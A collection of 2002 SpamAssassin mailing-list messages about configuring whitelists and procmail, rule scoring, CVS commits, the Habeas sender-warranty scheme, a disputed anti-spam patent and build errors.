&gt;&gt;non-HTML, non-newsletter-ish mail.  This release should be different, as
&gt;&gt;I've been spending the last month signing up a "nonspamtrap" to every
&gt;&gt;legit newsletter I can find ;)
&gt;&gt;
&gt;&gt;This should mean that tests which match common-enough newsletter practices
&gt;&gt;will no longer get such high scores once we re-run the GA.--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</si>
  <si>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As the subject line indicates, I'm sure these are stupid questions, but
I'm having trouble getting SA working like I understand it should work,
and have about given up on trying to figure it out myself.If a user has a line like:whitelist_from *@yahoogroups.comin his .spamassassin/user_prefs file, does that line not, in effect,
tell the program to take no action at all against any mail coming in from
yahoogroups.com, or is there still checking being done against it?  And if
the latter, what does he need to place in user_prefs to cause such mail
to be ignored?  I'm testing SA here with a few users who happen to be on
yahoogroups lists, before deploying it system-wide, and although the above
line has been added to their user_prefs files, much of their list mail is
still going to the spam folder due to all the usual things you would
expect to trigger SA.Thanks in advance for any help.--
Ken Scott,
admin@shellworld.net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</si>
  <si>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Update of /cvsroot/spamassassin/spamassassin/masses
In directory usw-pr-cvs1:/tmp/cvs-serv440/massesModified Files:
      Tag: b2_4_0
	mass-check 
Log Message:
Fixes, additions to mass-checkIndex: mass-check
===================================================================
RCS file: /cvsroot/spamassassin/spamassassin/masses/mass-check,v
retrieving revision 1.67
retrieving revision 1.67.2.1
diff -b -w -u -d -r1.67 -r1.67.2.1
--- mass-check	20 Aug 2002 12:29:32 -0000	1.67
+++ mass-check	22 Aug 2002 18:13:30 -0000	1.67.2.1
@@ -96,6 +96,7 @@
 print "# mass-check results from $who\@$where, on $when\n";
 print "# M:SA version ".$spamtest-&gt;Version()."\n";
+print '# CVS tag: $Name$',"\n";
 $iter-&gt;set_function (\&amp;wanted);
 $iter-&gt;run (@ARGV);
 exit;
@@ -132,6 +133,8 @@
   my $tests = $status-&gt;get_names_of_tests_hit();
   $tests = join(',', sort(split(/,/, $tests)));
+
+  $id =~ s/\s/_/g;
   printf "%s %2d %s %s\n",
 		    ($yorn ? 'Y'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</si>
  <si>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I think with the confusion and all, we should give these folks 
until the end of the day to get fixed logs uploaded :)Justin, on a related note -- I didn't include the spamtrap stuff 
from the corpus directory on your server in my logs, but that 
should definitely be in there -- don't know if you'd included it 
in yours or not.  I think it's from Kelsey's mailtraps...COn Thursday, August 22, 2002, at 09:49  AM, Justin Mason wrote:&gt; Files that are out of date (as far as I can tell -- they have no date
&gt; comment), and will be ignored:
&gt;
&gt;         nonspam-danielp.log
&gt;         nonspam-danielr.log
&gt;         nonspam-duncan.log
&gt;         nonspam-james.log
&gt;         nonspam-laager.log
&gt;         nonspam-messagelabs.log
&gt;         nonspam-msquadrat.log
&gt;         nonspam-olivier.log
&gt;         nonspam-oliviern.log
&gt;         nonspam-quinlan.log
&gt;         nonspam-rodbegbie.log
&gt;         nonspam-sean.log
&gt;         nonspam-theo.log-------------------------------------------------------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</si>
  <si>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On Thursday, August 22, 2002, at 09:36  AM, Justin Mason wrote:&gt;
&gt; "Craig R.Hughes" said:
&gt;
&gt;&gt; I thought we'd sort of decided that after 2.40 we'd switch the
&gt;&gt; meaning of the "lang" prefix to actually mean "run these rules
&gt;&gt; if language matches", where "language" is what TextCat spits out
&gt;&gt; for a message, as opposed to using the locale which is how
&gt;&gt; things currently work.
&gt;
&gt; ah, right -- I'd forgotten that.  :(
&gt;
&gt; doesn't help with the finding-broken-rules QA case though...It does, if you have a corpus of german spam and nonspam to feed 
it, and you're not in a de locale.C-------------------------------------------------------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</si>
  <si>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So do you know my public key?  Does the guy who wants to buy 
10,000 licenses of SpamAssassin Pro?  Do I really want to lose 
email from either of you?COn Thursday, August 22, 2002, at 10:13  AM, Tony L. Svanstrom wrote:&gt;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</si>
  <si>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Folks,I have just installed spamassassin 2.31 in my postfix MTA server.At first, I would like to test it just in my email account before 
applying it to the wole site.I configured just as in the INSTALL file:	5. Create a .forward...
	"|IFS=' ' &amp;&amp; exec /usr/bin/procmail -f- || exit 75 #user"
	6. create a .procmailrc
	:0fw
	| /usr/bin/spamassassin -c 
			/etc/mail/spamassassin/rulesBut the spams get trought it untouched. When I run it by the hand:cat sample-spam.txt | /usr/bin/spamassassin -c 
				/etc/mail/spamassassin/rulesit does tag it as spam and send me the email.what should I look at?Thank you,
-- 
Luiz Felipe Ceglia 	-  Staff TereNet
lceglia@terenet.com.br	-  +55-21-9135-3679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</si>
  <si>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Forwarded message ----------
From: Vernon Schryver 
To: dcc@calcite.rhyolite.com
Date: Mon, 26 Aug 2002 09:09:05 -0600 (MDT)
Subject: Version 1.1.11 of the DCCersion 1.1.11 of the DCC source is in
http://www.rhyolite.com/anti-spam/dcc/source/dccd.tar.Z and
http://www.dcc-servers.net/dcc/source/dccd.tar.Zhttp://www.rhyolite.com/anti-spam/dcc/dcc-tree/CHANGES and
http://www.dcc-servers.net/dcc/dcc-tree/CHANGES start with    fix dccm bugs with handling a non-responsive server.
    change misc/hackmc to modify sendmail.cf to reject unauthorized relay
	attempts with a temporary failure when they are supposed to be sent
	to the DCC but dccm is not running.  This prevents leaking relay
	relay spam.  You must use the new hackmc script to install this
	change in sendmail.cf.
    remove "# whitelisted" from `cdcc stats` output to give more room
	for totals.
    prevent empty dccproc log files as noted by Krzysztof Snopek.
    even fatal errors should cause dccproc to exit with 0 to avoid
	rejecting mail, as noted by Krzysztof Snopek.
    When server hostnames have common IP addresses, prefer the server
	with the non-anonymous client-ID, noted by Krzysztof Snopek.
Vernon Schryver    vjs@rhyolite.com
_______________________________________________
DCC mailing list      DCC@rhyolite.com
http://www.rhyolite.com/mailman/listinfo/dcc-------------------------------------------------------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</si>
  <si>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There is a whitelist RBL now!  Ironport's Bonded Sender is 
basically a whitelist RBL where you post a bond to get on the 
list, and then lose the bond if you end up spamming from that IP 
address (or something like that).  http://www.bondedsender.org/COn Sunday, August 25, 2002, at 07:58  PM, Bart Schaefer wrote:&gt;&gt; 4. DNSBL: Only certifies an ip address, not who is using it. As it is
&gt;&gt; currently used, DNSBL allows you to look up if some IP address 
&gt;&gt; has been
&gt;&gt; blacklisted by someone. What I haven't seen is a service that 
&gt;&gt; provides a
&gt;&gt; DNS based whitelist.
&gt;
&gt; There's a practical reason for that:  Any DNS list (white or 
&gt; black) works
&gt; only for a limited number of IPs; the set of unlisted IPs is 
&gt; much larger
&gt; than the set in the DNS list.  If you have to make a binary decision to
&gt; accept or reject, you'll be wrong less often if you reject the 
&gt; blacklist
&gt; and accept everything else, rather than accept the whitelist and reject
&gt; everything else.
&gt;
&gt; A whitelist is only helpful when (a) you only want mail from a limited
&gt; number of known sources, or (b) you can use a secondary system 
&gt; like SA to
&gt; decide what to do with the vast unlisted masses.  Most MTAs still make
&gt; only the binary decision, because the secondary computation is 
&gt; expensive.
&gt;
&gt; With SA's cooperation, though, it might be worth a try.  Even better if
&gt; one could get commercial anti-spam outfits to agree to factor it in.-------------------------------------------------------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</si>
  <si>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Political news T R U T H O U T uses it too.Justin Mason wrote:
&gt;&gt;&gt;&gt;  0.978    0.540    1.184    0.31   -1.00  FWD_MSG
&gt;&gt;&gt;
&gt;&gt;&gt;I'm a bit surprised that any spams hit this one.  Did somebody forward a 
&gt;&gt;&gt;spam that then went into a corpus?
&gt;&gt;
&gt;&gt;My corpus is quite clean and I get spam hits.
&gt; 
&gt; 
&gt; yes, it's being frequently forged already.
&gt; 
&gt; 
&gt;&gt;&gt;&gt;  1.582    2.226    1.279    0.64    0.39  GAPPY_TEXT
&gt;&gt;&gt;
&gt;&gt;&gt;Gappy text in a non-spam?  It must be a  H E A D L I N E  or something.  
&gt;&gt;&gt;Maybe just remove space from the list of "gap" characters?
&gt;&gt;
&gt;&gt;For 2.50, we could try to figure out which nonspams are hitting and
&gt;&gt;improve the rule.
&gt; 
&gt; 
&gt; BTW I subscribe to the Media Unspun newsletter, and it and a few others
&gt; regularly use that H E A D L I N E thing.
&gt; 
&gt; splitting it into 2, one that matches gappy text with punctuation chars,
&gt; one that matches spaces between the chars, would probably help.  if
&gt; anyone's bothered, I'd suggest filing a bug.
&gt; 
&gt; --j.
&gt; 
&gt; 
&gt; -------------------------------------------------------
&gt; This sf.net email is sponsored by: OSDN - Tired of that same old
&gt; cell phone?  Get a new here for FREE!
&gt; https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
&gt; _______________________________________________
&gt; Spamassassin-devel mailing list
&gt; Spamassassin-devel@lists.sourceforge.net
&gt; https://lists.sourceforge.net/lists/listinfo/spamassassin-devel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</si>
  <si>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
Luiz Felipe Ceglia said:&gt; 	:0fw
&gt; 	| /usr/bin/spamassassin -c 
&gt; 			/etc/mail/spamassassin/rulesare you using exactly that -- with the line break -- or is it like this:  :0fw
  | /usr/bin/spamassassin -c /etc/mail/spamassassin/rulesall on one line?  it should be the latter.--j.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</si>
  <si>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Brian R. Melcer said:
&gt;&gt; I've got spamassassin installed and tested on MacOS X 10.1.5,
&gt;&gt; although there are issues with spamd still.  So in addition to
&gt;&gt; looking for new and different uses for SA, I'd like to hear
&gt;&gt; from folks using it under MacOS X.
&gt;
&gt; I just recently converted our SA setup to use Amavisd into our PostfixAmavisd or Amavisd-new? If the latter, you don't need spamd running, since
amavisd-new calls SA functions directly.-- 
PGP Fingerprint: 0AA8 DC47 CB63 AE3F C739 6BF9 9AB4 1EF6 5AA5 BCDF
Member, LEAF Project     AIM: MikeLeone
Public Key - Some days you're the pigeon; some days you're the statue.
Random Thought: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</si>
  <si>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Daniel Quinlan  wrote:
&gt; Exactly, except that I think you may be too optimistic
&gt; about the reporting, the timeframe, and the accuracy.That's another argument for a "HLL" (Habeas Licensee List) which would be less
inclusive than a test for the mark of for HIL, but more timely and accurate. When an
ip address is on the HLL it could get a huge negative score, bigger than the Habeas
mark alone. -- sidney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</si>
  <si>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"Craig R.Hughes" said:&gt; The GA run on the current corpus is yielding an average (mean) 
&gt; score for false-positives of about 10 points, which is higher 
&gt; than before.  There's some tweaking to be done yet (rule 
&gt; elimination and such), so that will likely fall, but -15 might 
&gt; not be enough of a correction in many situations.  I will set 
&gt; the scores for the Habeas stuff and the Ironport stuff to be 
&gt; sensible given:
&gt; 
&gt; a) estimated likeliness of compliance with Habeas/Bonded sender 
&gt; rules, and
&gt; b) score correction level needed to achieve purposes of those projects.Using the score-ranges stuff and my aggressive anti-FP evaluation code,
BTW, yielded an average FP of 5.7 points, with 0.67% FPs and 96.57%
overall accuracy -- but I notice you went back to the other method.
Just pointing this out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</si>
  <si>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26 Aug 2002 the voices made bugzilla-daemon@hughes-family.org write:&gt; http://www.hughes-family.org/bugzilla/show_bug.cgi?id=735&gt; ------- Additional Comments From br+spamassassin@panix.com  2002-08-26 09:33 -------
&gt; Just because it's documented doesn't mean it's a good thing.
&gt;
&gt; I work for an ISP.  We provide SpamAssassin to our customers.  I got email
&gt; today from a support tech saying that "spamassassin -t" reports that a
&gt; message is probably spam even when it's not, and why is this, and can we
&gt; change it?  I thought about why it is, and the only answer I could come up
&gt; with was, "it was easier for the programmer that way".  That's an answer, I
&gt; guess, but her point was that this is going to generate support calls, and
&gt; support calls cost us time and money. Why would a customer use `spamassassin -t` without understanding what it does?
	/Tony
-- 
# Per scientiam ad libertatem! // Through knowledge towards freedom! #
# Genom kunskap mot frihet! =*= (c) 1999-2002 tony@svanstrom.com =*= #     perl -e'print$_{$_} for sort%_=`lynx -dump svanstrom.com/t`'-------------------------------------------------------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</si>
  <si>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 26 Aug 2002 the voices made CertaintyTech write:&gt; Recently I have been receiving Spam where both the From: and To: address are
&gt; set to my address therefore getting thru due to AWL.  Any suggestions on
&gt; this one?  I could turn off AWL but it does have advantages.  BTW, I use a
&gt; site-wide AWL. Use cron to remove your address from the AWL daily...?!	/Tony
-- 
# Per scientiam ad libertatem! // Through knowledge towards freedom! #
# Genom kunskap mot frihet! =*= (c) 1999-2002 tony@svanstrom.com =*= #     perl -e'print$_{$_} for sort%_=`lynx -dump svanstrom.com/t`'-------------------------------------------------------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</si>
  <si>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</si>
  <si>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Update of /cvsroot/spamassassin/spamassassin/debian
In directory usw-pr-cvs1:/tmp/cvs-serv23243/debianModified Files:
	spamassassin.README.Debian 
Log Message:
removed -PIndex: spamassassin.README.Debian
===================================================================
RCS file: /cvsroot/spamassassin/spamassassin/debian/spamassassin.README.Debian,v
retrieving revision 1.1
retrieving revision 1.2
diff -b -w -u -d -r1.1 -r1.2
--- spamassassin.README.Debian	21 Jun 2002 02:46:50 -0000	1.1
+++ spamassassin.README.Debian	27 Aug 2002 09:31:29 -0000	1.2
@@ -2,7 +2,7 @@
 you wish to use spamd (the Daemon version of spamassassin), please edit
 /etc/default/spamassassin.
-'spamc' is equivalent to 'spamassassin -P' and you should use it instead if
+'spamc' is equivalent to 'spamassassin' and you should use it instead if
 (and only if) you enabled 'spamd' (and you've installed the spamc package)
 To add rules, change scores, edit the template, edit-------------------------------------------------------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</si>
  <si>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 xml:space="preserve">
On Tuesday, August 27, 2002, at 06:03  AM, Tony L. Svanstrom wrote:&gt; Where can I find it, I was searching online without any luck... =(You can't, because there isn't one, yet.  Habeas is using a 
combination of copyright and trademark law to protect their 
sender warranties.  They hope to patent the system, but they 
have not been ISSUED a patent.--B-------------------------------------------------------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</si>
  <si>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27 Aug 2002 the voices made Matt Sergeant write:&gt; I've got 6C115 (I think) the current developer release (though not the same
&gt; as gold). The only difference AFAIK is the path to a single helpfile, which we don't use
anyways, right? *G*
	/Tony
PS I also have a problem with that stupid helpprogram crasching whenever I
search for "windows"; not sure if that's a feature or not. =)
-- 
# Per scientiam ad libertatem! // Through knowledge towards freedom! #
# Genom kunskap mot frihet! =*= (c) 1999-2002 tony@svanstrom.com =*= #     perl -e'print$_{$_} for sort%_=`lynx -dump svanstrom.com/t`'-------------------------------------------------------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</si>
  <si>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jm@jmason.org (Justin Mason) writes:&gt; Sounds a lot like TMDA to me. :( Filing date is July 26, 2001,
&gt; granted May 16, 2002.
&gt;
&gt; TMDAers, have you seen this before?No, but thanks for pointing it out.&gt; I'd presume TMDA is prior art, but still, it could be troublesome...Yup.  TMDA's core functionality was fully established before even the
filing date.Anyone with experience in this area have a recommendation on whether
this should be pursued or not?</t>
  </si>
  <si>
    <t>jm@jmason.org (Justin Mason) writes:&gt; Actually, I want to avoid that -- I've already removed spamproxyd
&gt; from the distro for 2.40. Here's why:
&gt; 
&gt; When they're in the distro, *we* have to support them -- which is
&gt; not necessarily a good thing when we didn't write them in the first
&gt; place, or when the coder in question may not *want* us to maintain
&gt; them. :(I would be in favor of creating new SpamAssassin CVS modules and
Bugzilla categories for other clients (provided there is sufficient
interest and a maintainer).Dan</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt; I would be in favor of creating new SpamAssassin CVS modules and
&gt; Bugzilla categories for other clients (provided there is sufficient
&gt; interest and a maintainer).yeah, I'd be with that -- as long as they have a maintainer ;)however regarding CVS, I'd say many projects might find it easier
to just sign up as a new proj with sf.net -- it might save them having
to go through us (not sure, depends on what sf.net's procedures
are like).--j.</t>
  </si>
  <si>
    <t>-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1On Tuesday 27 August 2002 07:45 am, Justin Mason wrote:
&gt; Tony Svanstrom, on SpamAssassin-talk, noted this US patent:
&gt;
&gt; http://appft1.uspto.gov/netacgi/nph-Parser?Sect1=PTO2&amp;Sect2=HITOFF&amp;u=/netah
&gt;tml/PTO/search-adv.html&amp;r=62&amp;f=G&amp;l=50&amp;d=PG01&amp;s1=spam&amp;p=2&amp;OS=haiku&amp;RS=spam
&gt;
&gt;   Method of anti-spam
&gt;
&gt;   Abstract
&gt;
&gt;   A method of anti-spam is to set an optional trustcode, or a trustlist, or
&gt;   at least a trustweb based on online mail delivery at a recipient's e-mail
&gt;   address. A mail sender is compelled at the first time to deliver a mail
&gt; by way of: taking the way of "Visiting trustweb and sending online", or
&gt; enclosing the recipient's trustcode in the mail and sending in another way
&gt; other than the mentioned. After the sender's e-mail address has been stored
&gt; automatically in the recipient's trustlist, the sender may send mails to
&gt; the same recipient in whatever the ways feasible.
&gt;
&gt;
&gt; Sounds a lot like TMDA to me. :(  Filing date is July 26, 2001,  granted
&gt; May 16, 2002.
&gt;
&gt; TMDAers, have you seen this before?  I'd presume TMDA is prior art, but
&gt; still, it could be troublesome...
&gt;
&gt;
I took a bit of time to review what is on the above URL.  If I were a news 
editor, the headline would be:"Inventor" from country that ignores patents and copyrights, seeks patent for 
inventing the wheel!
- -- 
- ------------------------------------------------------------------------
Robin Lynn Frank---Director of Operations---Paradigm, Omega, LLC
http://paradigm-omega.com              http://paradigm-omega.net
Â©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(GNU/Linux)iD8DBQE9bEcKD5jX03fqNxQRAmTfAKDM6BDsePbg8fb9Ore0XuS5jB4t1wCfbTcw
/PBXqXO7Pei1f9lIj4gd0/c=
=PNJx
-----END PGP SIGNATURE-----</t>
  </si>
  <si>
    <t>&gt;&gt;From tmda.net/history.html:The first release of TMDA in April 2001 was essentially a rewrite of TMS in
Python, April 2001 is earlier than July 26, 2001... prior art..from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2kTMDA was already at 0.21 8 days before filing for a patent..----- Original Message -----
From: "Jason R. Mastaler" 
To: "Justin Mason" 
Cc: ; 
Sent: Tuesday, August 27, 2002 11:34 AM
Subject: [SAtalk] Re: patent on TMDA-like system
jm@jmason.org (Justin Mason) writes:&gt; Sounds a lot like TMDA to me. :( Filing date is July 26, 2001,
&gt; granted May 16, 2002.
&gt;
&gt; TMDAers, have you seen this before?No, but thanks for pointing it out.&gt; I'd presume TMDA is prior art, but still, it could be troublesome...Yup.  TMDA's core functionality was fully established before even the
filing date.Anyone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</si>
  <si>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On Tue, 27 Aug 2002 the voices made Jason R. Mastaler write:&gt; jm@jmason.org (Justin Mason) writes:
&gt;
&gt; &gt; Sounds a lot like TMDA to me. :( Filing date is July 26, 2001,
&gt; &gt; granted May 16, 2002.
&gt; &gt;
&gt; &gt; TMDAers, have you seen this before?
&gt;
&gt; No, but thanks for pointing it out.
&gt;
&gt; &gt; I'd presume TMDA is prior art, but still, it could be troublesome...
&gt;
&gt; Yup.  TMDA's core functionality was fully established before even the
&gt; filing date.
&gt;
&gt; Anyone with experience in this area have a recommendation on whether
&gt; this should be pursued or not? If you think you can survive it, please fight... When I found that patent I
found others that were just common sense, things that any geek could implement
with his script/shell-language of choice; and it's time for someone to get the
medias attention on what's going on.
 Basically this is the new wave of "namenappers"; it used to be domainnames,
not it's all the basic general ideas they can think off/find on the web that
they're patenting.
	/Tony
-- 
# Per scientiam ad libertatem! // Through knowledge towards freedom! #
# Genom kunskap mot frihet! =*= (c) 1999-2002 tony@svanstrom.com =*= #     perl -e'print$_{$_} for sort%_=`lynx -dump svanstrom.com/t`'
</t>
  </si>
  <si>
    <t>On Tuesday 27 August 2002 19:26 CET Leroy B. wrote:
&gt; Ignore...Can't.-------------------------------------------------------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</si>
  <si>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 0 hits here. :(
| I also get a lot of them. I think they're using the domain registry
database to pull their victims' addresses.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</si>
  <si>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28 August 2002 16:33 CET Theo Van Dinter wrote:
&gt; On Wed, Aug 28, 2002 at 04:20:52PM +0200, Malte S. Stretz wrote:
&gt; &gt; I get about 3 of these per week. A google for trafficmagnet convinces
&gt; &gt; me that they're worth their own rule...
&gt;
&gt; 0 hits here. :(I recently cleaned my spam corpus from them but these are my current 
results:
   OVERALL        SPAM     NONSPAM  NAME
     13929         995       12934  (all messages)
        13          13           0  T_TRAFFICMAGNETI put it into cvs_rules_under_test, let's see what the 2.41 GA run thinks 
about it :)Malte--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</si>
  <si>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Steve Thomas  [2002-08-28T07:52-0700]:
&gt; I also get a lot of them. I think they're using the domain registry
&gt; database to pull their victims' addresses. Along with the usual webmaster@* and probably a dash of web harvesting
on the side from the ones I have seen.A recent conversation in two lines:Me:  Okay, trafficmagnet is being access mapped off now.
Junior admin [catching up on email after conference]: Thank God!-- 
Jeremy Mates                                        http://www.sial.org/OpenPGP: 0x11C3D628  (4357 1D47 FF78 24BB 0FBF 7AA8 A846 9F86 11C3 D628)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</si>
  <si>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28 August 2002 16:45 CET Steve Thomas wrote:
&gt; | 0 hits here. :(
&gt;
&gt; I also get a lot of them. I think they're using the domain registry
&gt; database to pull their victims' addresses.They are crawling through the pages and send their "offers" to all addresses 
they find. Theo won't every receive any offers as he doesn't publish his 
address there ;-)Malte--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</si>
  <si>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http://www.hughes-family.org/bugzilla/show_bug.cgi?id=777------- Additional Comments From daniel@roe.ch  2002-08-28 09:15 -------
3. usage of  just like  (ie. without ) which is obsolete
   (not sure whether some mailers still produce such broken html)
4. tag argument values sometimes enclosed in "", sometimes not
5. colour args without # in front of hex rgb code
6. colour args with non-6-digit rgb code (typo)
7. onMouseOver et al in nonconsistent case throughout the documentMind, those are just ideas. I'm pretty sure some or even most of them
are not working in practice, but they might be worth checking out.
------- You are receiving this mail because: -------
You are on the CC list for the bug, or are watching someone who is.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</si>
  <si>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Update of /cvsroot/spamassassin/spamassassin/masses
In directory usw-pr-cvs1:/tmp/cvs-serv6501/massesRemoved Files:
      Tag: b2_4_0
	evolve.cxx 
Log Message:
removed old evolver--- evolve.cxx DELETED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</si>
  <si>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/cvsroot/spamassassin/spamassassin
In directory usw-pr-cvs1:/tmp/cvs-serv6501Modified Files:
      Tag: b2_4_0
	MANIFEST 
Log Message:
removed old evolverIndex: MANIFEST
===================================================================
RCS file: /cvsroot/spamassassin/spamassassin/MANIFEST,v
retrieving revision 1.100.2.11
retrieving revision 1.100.2.12
diff -b -w -u -d -r1.100.2.11 -r1.100.2.12
--- MANIFEST	28 Aug 2002 13:50:15 -0000	1.100.2.11
+++ MANIFEST	28 Aug 2002 16:55:16 -0000	1.100.2.12
@@ -50,7 +50,6 @@
 masses/CORPUS_POLICY
 masses/CORPUS_SUBMIT
 masses/craig-evolve.c
-masses/evolve.cxx
 masses/freqdiff
 masses/hit-frequencies
 masses/lib/Mail/ArchiveIterator.pm-------------------------------------------------------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</si>
  <si>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 xml:space="preserve">
Well if you're talking about epiphany, which is in January, then yes it is
5 months.Some people do celebrate Christmas on january 6th, or even the 13th.But I am certain that what you are thinking is the correct thought.Please don't flame me. Just trying to be humerous =)
Matt Kettler said:
&gt; On an unrelated, but similarly amusing note, a spam I received (and was
&gt;  tagged by SA) today began with:
&gt;
&gt;
&gt; &gt; I bet you haven't even realized that Christmas is just 5 months away,
&gt; &gt;
&gt; did you?
&gt;
&gt;
&gt; Strangely, no I wasn't aware that Christmas was 5 months away. Here in
&gt; the  US Christmas is a bit less than 4 months away. Where exactly is
&gt; the  "international month line" anyway? I've never seen the -74400
&gt; timezone  before, but I bet it qualifies as INVALID_DATE_TZ_ABSURD :)
&gt;
&gt;
&gt;
&gt;
&gt; -------------------------------------------------------
&gt; This sf.net email is sponsored by: Jabber - The world's fastest growing
&gt;  real-time communications platform! Don't just IM. Build it in!
&gt; http://www.jabber.com/osdn/xim
&gt; _______________________________________________
&gt; Spamassassin-talk mailing list
&gt; Spamassassin-talk@lists.sourceforge.net
&gt;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</si>
  <si>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;)As a new user of SA, I guess I'm having trouble connecting the dots.  If 
I understand you:  If I don't use the "nomime" =&gt; 1 option and I recieve 
MIME mail, the Mail::Internet modules become unavailable.Unavailable for which?  MA?  SA?  What do these methods do?  Does this 
mean my incoming MIME mail won't be checked by SA unless I specify 
"nomime" =&gt; 1?Thanks,
Phil
</t>
  </si>
  <si>
    <t>OK guys -- I reckon it's now Good Enough, modulo some minor score
tweaking, or commenting of some more broken/high-FP-ing rules.What do you all think?  are we ready to go?  anyone run into any trouble
with the new autoconf code, or found a bug from the merge of that spamc
BSMTP-support patch?I expect there *will* be a 2.41 BTW.--j.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</si>
  <si>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Hi, I'm trying to build SA under Digital Unix 4.0f and am receiving a
compile error (and many warnings) for spamc.  The "perl Makefile.PL"
does OK, but when I do the make, I get this:cc -std -fprm d -ieee -D_INTRINSICS -I/usr/local/include -DLANGUAGE_C
-O4 spamd
/spamc.c  -o spamd/spamc -L/usr/local/lib -lbind -ldbm -ldb -lm -liconv
-lutil
cc: Error: spamd/spamc.c, line 50: In this declaration, "in_addr_t" has
no linka
ge and has a prior declaration in this scope at line number 592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cc: Warning: spamd/spamc.c, line 202: In this statement, the referenced
type of
the pointer value "header_buf" is "char", which is not compatible with
"const un
signed char". (ptrmismatch)
    full_write (out,header_buf,bytes2);
--------------------^
cc: Warning: spamd/spamc.c, line 203: In this statement, the referenced
type of
the pointer value "msg_buf" is "char", which is not compatible with
"const unsig
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
ned char". (ptrmismatch)
      full_write (out, out_buf, out_index);
-----------------------^
cc: Warning: spamd/spamc.c, line 497: In this statement, the referenced
type of
the pointer value "msg_buf" is "char", which is not compatible with
"const unsig
ned char". (ptrmismatch)
      full_write (STDOUT_FILENO,msg_buf,amount_read);
--------------------------------^
cc: Warning: spamd/spamc.c, line 512: In this statement, the referenced
type of
the pointer value "msg_buf" is "char", which is not compatible with
"const unsig
ned char". (ptrmismatch)
      full_write(STDOUT_FILENO,msg_buf,amount_read);
-------------------------------^
*** Exit 1
Stop.Can anyone suggest a way to get around this?   TIA...Jim McCullars
The University of Alabama in Huntsville-------------------------------------------------------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</si>
  <si>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SHA1I may be dense, but why would anyone want to utilize Habeus?  To me, it looks 
like a potential backdoor to anyone's defenses against spam.If I were a spammer, I'd simply set up a server, send out my spam with the 
Habeus headers and continue till I was reasonably certain I'd been reported.  
Then I'd simply reconfigure the server and reconnect to a different IP.  As 
long as no one can establish my connection to the web sites my spam is 
directing people to, I'm home free.Since I can set up spamassassin to I don't "lose" any email, what do I gain 
by making it easier for spam to get through??
- -- 
- ------------------------------------------------------------------------
Robin Lynn Frank---Director of Operations---Paradigm, Omega, LLC
http://paradigm-omega.com              http://paradigm-omega.net
Â©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(GNU/Linux)iD8DBQE9bRrzD5jX03fqNxQRAjQnAJsE55BZGj0MGZdLTuBTUZqTGeQLwQCfXPzV
qfH+nyAg+m+ZKNvLi2BcJGI=
=YsRI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</si>
  <si>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To update spamassasin, all I need to do is install the new tar.gz 
file as if it were a new installation? I don't need to stop incoming 
mail or anything like that? Thanks, Mike
-- 
Michael Clark, Webmaster
Center for Democracy and Technology
1634 Eye Street NW, Suite 1100
Washington, DC 20006
voice: 202-637-9800
http://www.cdt.org/Join our Activist Network! Your participation can make a difference!
http://www.cdt.org/join/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</si>
  <si>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&gt; the number 1 ISP in France and the third ISP in
&gt; Europe Wanadoo.fr is using non RFC2822 compliant
&gt; mail servers:Wanadoo.fr is notorious for being unresponsive to spam abuse 
complaints.  Some of the more militant admins have blocked them 
completely.Rossz-------------------------------------------------------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</si>
  <si>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&gt; I may be dense, but why would anyone want to utilize Habeus?  To
&gt; me, it looks like a potential backdoor to anyone's defenses against spam.You're not dense. I'm going to zero the habeas scores on my copy of
SpamAssassin. I think they were added to SA quite prematurely. To me it's
simple:1. People who send me legitimate email have absolutely no motivation to use
Habeas, at least until it gets lots more press, and even then only
bulk-mailing companies like Amazon or eBay are going to bother, and I
already whitelist them. Individuals won't bother.2. Spammers have lots of motivation to forge the Habeas headers, and a good
percentage of them are completely out of the legal reach of Habeas.I think it should be subjected to the same testing and scrutiny as any other
potential new rule. When I test against my corpus here's what I get:OVERALL     SPAM  NONSPAM     S/O   SCORE  NAME
  13851     8919     4932    0.64    0.00  (all messages)
      0        0        0    0.00   -1.00  HABEAS_SWEThe score of -1.0 is pretty harmless right now, but it still looks like a
useless rule so far.--
Michael Moncur  mgm at starlingtech.com  http://www.starlingtech.com/
"Never interrupt your enemy when he is making a mistake." --Napoleon-------------------------------------------------------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</si>
  <si>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2002-08-28 at 13:57, Michael Clark wrote:
&gt; To update spamassasin, all I need to do is install the new tar.gz 
&gt; file as if it were a new installation? I don't need to stop incoming 
&gt; mail or anything like that? Thanks, Mike
If you are using spamd, you will have to stop/restart it. -- 
Larry Rosenman                     http://www.lerctr.org/~ler
Phone: +1 972-414-9812                 E-Mail: ler@lerctr.org
US Mail: 1905 Steamboat Springs Drive, Garland, TX 75044-6749-------------------------------------------------------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</si>
  <si>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
On Wednesday, August 28, 2002, at 11:48  AM, Robin Lynn Frank wrote:&gt; If I were a spammer, I'd simply set up a server, send out my 
&gt; spam with the
&gt; Habeus headers and continue till I was reasonably certain I'd 
&gt; been reported.
&gt; Then I'd simply reconfigure the server and reconnect to a 
&gt; different IP.  As
&gt; long as no one can establish my connection to the web sites my spam is
&gt; directing people to, I'm home free.Uh... the reason is simple. Habeas runs something called the 
"Habeas Infringers List", and if you use their trademark without 
their permission, you'll end up on it.  Then, when you send spam 
with the misappropriated header, users of SA (2.40 supports 
this) will tag your mail as spam, rather than let it through. 
This may be done independantly of your IP address, so be 
prepared to constantly change domain names, and move your 
servers as fast as you send spam.Also, that little haiku is a copyrighted work, so not only CAN 
Habeas sue, they MUST sue to protect their copyright. And since 
it's a trademark as well, that's a double-whammy. Habeas has 
some pretty high-powered legal people, who will gladly go to 
town on violators.The whole point here is to give them the legal leverage they 
need to put spammers out of business, and not only block mail 
from them, but allow through the things that really AREN'T spam.--B-------------------------------------------------------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</si>
  <si>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SHA1On Wednesday 28 August 2002 01:34 pm, Brian McNett wrote:&gt;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Â©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</si>
  <si>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Justin Mason wrote:&gt; What do you all think?  are we ready to go?  anyone run into any trouble
&gt; with the new autoconf code, or found a bug from the merge of that spamcI am now preparing a small patch to configure.in for NetBSD (possibly
also useful for Open- and FreeBSD, don't know). Should be ready and
tested in the next half hour.If you think 2.40 is ready, I would suggest to wait just 24 hours more
for possible reports by b2_4_0 users. Not everyone can follow the
development during daytime (at work).
ciao
     Klaus-------------------------------------------------------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</si>
  <si>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I'm a new user (or about to be, hopefully) of SA but I've run into some
compilation errors that prevent me from installing.  Rather than picking
through the code, I thought I'd avoid reinventing the wheel and ask here.
When I run the 'make', I get the following:cc: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--------------------^There are lots more where they came from.  Any ideas what can be done?
Thanks in advance.================================================================================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</si>
